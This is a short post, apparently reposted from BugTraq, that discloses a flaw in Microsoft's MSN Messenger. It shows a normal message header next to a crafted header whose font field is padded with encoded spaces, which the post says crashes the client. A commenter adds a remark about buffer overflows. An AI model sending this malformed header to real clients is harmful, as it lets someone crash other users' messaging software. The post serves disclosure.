Another serious MSN Messenger flaw
From BugTraq:
Introduction to the flaw.
Msn Messenger is a popular Instant-Messaging client from
Microsoft. After the previous flaws regarding the privacy
of users another flaw is discovered. This flaw makes the
msn messenger client crash after receiving a misformated
font variable in the message header with instant messages.
How does it work exactly?
The Msn Messenger client works by sending a header with
every message. So every time a user wants to send a
message, it generates a header, containing information
about the font, the color of the message and some other
information.
The flaw
A normal header look something like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
When we replace the font field with something very large.
Creating an overflaw the header will look like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
As a result the Msn Messenger client will crash
this flaw only crashes the Msn Messenger from Microsoft.
Trillian is not affected.
This flaw is a severe danger. As it's not so hard for
hackers to use this flaw in their application.
Microsoft has been informed on this issue.
When are people GOING TO LEARN about buffer overflows? I wonder how many more holes exist in MSN Messenger?